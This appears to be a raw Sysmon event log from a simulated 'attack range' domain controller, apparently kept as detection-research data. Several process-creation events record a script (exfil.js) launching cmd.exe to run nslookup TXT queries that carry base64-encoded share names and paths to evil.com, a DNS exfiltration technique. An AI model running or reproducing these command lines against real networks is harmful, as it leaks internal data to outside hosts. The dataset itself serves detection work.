14:16:27.122{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000199117Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.771{00000000-0000-0000-0000-000000000000}4832<unknown process>-udptruefalse127.0.0.1-52569-false127.0.0.1-53domain 354300x8000000000000000199116Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.693{00000000-0000-0000-0000-000000000000}3956<unknown process>-udpfalsefalse127.0.0.1-52568-false127.0.0.1-53domain 354300x8000000000000000199115Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.291{00000000-0000-0000-0000-000000000000}7628<unknown process>-udpfalsefalse127.0.0.1-52556-false127.0.0.1-53domain 10341000x8000000000000000199114Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.122{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000199113Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:24.201{00000000-0000-0000-0000-000000000000}8132<unknown process>-udpfalsefalse127.0.0.1-52553-false127.0.0.1-53domain 10341000x8000000000000000199112Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.122{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199111Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.122{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-EF3F-000000005F02}8104C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199110Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.122{2E1864BB-17BB-629A-ED3F-000000005F02}4887260C:\Windows\system32\cmd.exe{2E1864BB-17BB-629A-EF3F-000000005F02}8104C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199109Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.133{2E1864BB-17BB-629A-EF3F-000000005F02}8104C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BB-629A-ED3F-000000005F02}488C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrsc.tmp 2>&1 10341000x8000000000000000199108Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.106{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17BB-629A-EE3F-000000005F02}3764C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199107Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.106{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BB-629A-EE3F-000000005F02}3764C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199106Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.084{2E1864BB-17BB-629A-EE3F-000000005F02}37647772C:\Windows\system32\conhost.exe{2E1864BB-17BB-629A-ED3F-000000005F02}488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199105Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.084{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-EE3F-000000005F02}3764C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199104Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.068{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199103Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.068{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199102Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.068{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199101Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.068{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199100Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.068{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-ED3F-000000005F02}488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199099Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.068{2E1864BB-17A1-629A-783D-000000005F02}55524348C:\Windows\System32\WScript.exe{2E1864BB-17BB-629A-ED3F-000000005F02}488C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199098Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.078{2E1864BB-17BB-629A-ED3F-000000005F02}488C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2xcYXR0YWNrcmFuZ2UubG9jYWxcU0NSSVBUUw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrsc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199097Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.068{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nliikib.tmpMD5=CB596D298926BB7548136A14BD30FF7C,SHA256=F828C268F75B06BE1AA98CB1BF6D08702D0B68C46C1A2B67F8CB9ED67478BB62,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199096Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.006{2E1864BB-17BA-629A-EB3F-000000005F02}46165104C:\Windows\system32\conhost.exe{2E1864BB-17BB-629A-EC3F-000000005F02}2252C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199095Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.006{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BB-629A-EC3F-000000005F02}2252C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199094Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.006{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199093Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.006{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199092Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.006{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199091Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.006{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199090Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.006{2E1864BB-17BA-629A-EA3F-000000005F02}78326076C:\Windows\system32\cmd.exe{2E1864BB-17BB-629A-EC3F-000000005F02}2252C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199089Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:27.014{2E1864BB-17BB-629A-EC3F-000000005F02}2252C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BA-629A-EA3F-000000005F02}7832C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nliikib.tmp 2>&1 23542300x800000000000000043932Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:27.214{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA398086F29DA0624A6973CB6230D994,SHA256=FBC2C1199EAFAF9516AE3D848C8B6B766E5EA54E21F7014ED97F8714ED6F511D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199771Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.992{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199770Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.992{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199769Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 